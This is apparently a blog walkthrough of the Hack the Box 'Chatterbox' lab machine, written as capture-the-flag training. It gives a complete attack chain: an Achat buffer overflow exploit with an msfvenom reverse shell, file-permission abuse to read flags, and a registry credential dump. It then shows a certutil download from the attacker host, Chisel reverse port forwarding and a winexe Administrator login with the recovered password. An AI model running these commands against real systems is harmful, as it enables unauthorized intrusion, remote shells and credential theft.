Hack the Box - Chatterbox - Walkthrough
Introduction
Today we're going to be doing a pentest walkthrough of the Chatterbox machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Chatterbox machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.81.94Scanning and Enumeration
We'll start by scanning for open ports with Nmap:
sudo nmap -T4 -p- 10.129.81.94
Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:
sudo nmap -sV -T4 -p9255,9256 10.129.81.94
There's only one service listed here, so let's see if there's any public exploit for it:
searchsploit achat
searchsploit achat
Let's take a look at this Python exploit:
searchsploit -x 36025.py
We've got a Python buffer overflow exploit, which requires us to supply a payload and the IP address of the target. To execute this, we'll need to:
1) Copy the exploit to our working directory
2) Setup a Netcat listener on our attacking system
3) Create a payload for the script using MSFvenom
4) Modify the exploit script
5) Execute the exploit script
Step 1
We copy the exploit script to our working directory and rename it:
searchsploit -m 36025 && mv 36025.py AchatBOF.py
Step 2
Setup a Netcat listener on our attacking machine:
sudo nc -nlvp 9255
Step 3
Create the payload for the exploit using MSFvenom:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=tun0 LPORT=9255 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Step 4
Modify the exploit script, replacing the payload and IP address portions
gedit AchatBOF.py
Step 5
With our script modified and our listener setup, we can now execute the script:
python AchatBOF.py
whoami
Capturing the User Flag
Hack the Box Windows system User flags are usually located in a user's \Desktop directory. In this case, it's the Alfred user's:
type c:\users\alfred\desktop\user.txt
Foothold Enumeration
While we enumerate the system, we know that our objective Root flag file is located in the Administrator's \Desktop directory. Normally, on secure Windows systems, all branches of the \Users' directory are inaccessible to a user's except their own. On this system, our current Alfred user has access to the Administrator's \Users directories, including the \Desktop directory where the root.txt flag is.
This leads us to two possiblities about the user structure of the system:
1) Alfred is the administrator on this system, but they prefer to work in the Alfred account, so they gave the Alfred account elevated file permissions.
2) The system's file permissions in general are misconfigured, giving all users elevated file permissions.
We check exactly how high our file permissions go by using the icacls command on the Administrator's \Desktop directory:
icacls c:\users\administartor\desktop
Capturing the Root Flag
Alfred and the Administrator both have the same file permissions in this directory, which means we can change the file permissions for any file in the directory, including the root.txt file. We do this now, then access the flag:
icacls c:\users\administrator\desktop\root.txt /grant alfred:F
type root.txt
Alfred and the Administrator both have the same file permissions in this directory, which means we can change the file permissions for any file in the directory, including the root.txt file. We do this now, then access the flag:
icacls c:\users\administrator\desktop\root.txt /grant alfred:F
type root.txt
Privilege Escalation (Becoming Administrator)
For educational purposes, we would also like to find a method of privilege escalation on the system, accessing either the SYSTEM or Administrator accounts.
While searching through the system registry for passwords, we find this:
reg query HKLM /f /t REG_SZ /s
This is a good hit, so we look a little deeper:
reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /s
reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /s
With these credentials, we can remotely login to the system as Alfred using Winexe. If our previous hypothesis that Alfred and the Administrator are the same person, it's possible that these two accounts share the same password. So if we can login using Winexe, we could try to login as the Administrator user. This requires network port 445 to be accessible, but from our initial Nmap scan, we know that this port is not open to outside machines.
However, if the port is open internally, we can perform local port forwarding to make the port accessible to our attacking machine. We check if port 445 is open locally on this system:
netstat -ano
Port 445 is listening locally, which means we can attempt to perform local port forwarding via the Chisel program.
Installing Chilsel on Kali was covered in our previous walkthrough for the Buff Hack the Box machine, but a quick rundown of the commands to run (as the root account) follow:
curl https://i.jpillora.com/chisel! | bash
We also need to transfer a Chisel binary to the target machine to complete the port-forwarding connection. First, we need to check if the target Windows system is running as 32 or 64 bit:
set
The system is 32-bit, so we download the 32-bit binary of Chisel to our attacking machine:
wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_386.gz
Then we Gunzip the gz file and rename the executable to something more convenient:
gunzip chisel_1.7.6_windows_386.gz
mv chisel_1.7.6_windows_386 chisel32.exe
Now to transfer the file to the Windows machine. First we serve the file using Python's HTTP server module:
sudo python -m SimpleHTTPServer 9255
Then, from the Windows machine, we move to a publicly writable directory, then use Certutil to download the file:
cd c:\users\public\downloads
certutil -urlcache -split -f http://10.10.99.99:9255/chisel32.exe
With Chisel on both machines, we start the connection by starting Chisel on our attacking machine:
sudo chisel server -p 9000 --reverse
(note: we rename the Chisel binary on the Windows machine for convenience before the next step)
And to finish the port-forwarding connection, we start Chisel on the Windows machine:
rename chisel32.exe chisel.exe
chisel.exe client 10.10.99.99:9000 R:445:0.0.0.0:445
Now that the port forward is established, we can attempt to remotely login to the system as Administrator using Alfred's password via the Winexe program.
winexe -U ‘administrator%Welcome1!’ //127.0.0.1 cmd.exe
Summary
After initial scans, we found that the target system was running a vulnerable network service that had an associated public buffer overflow exploit. Through that exploit, we were able to establish a foothold on the system. Configured file permissions allowed us to capture the objective flag file, but we also wished to achieve administrator status on the system. Enumeration of the system revealed exposed passwords, and utilizing port-forwarding on the system we were able to login as the Administrator user due to password reuse.
Finish
Comments
Post a Comment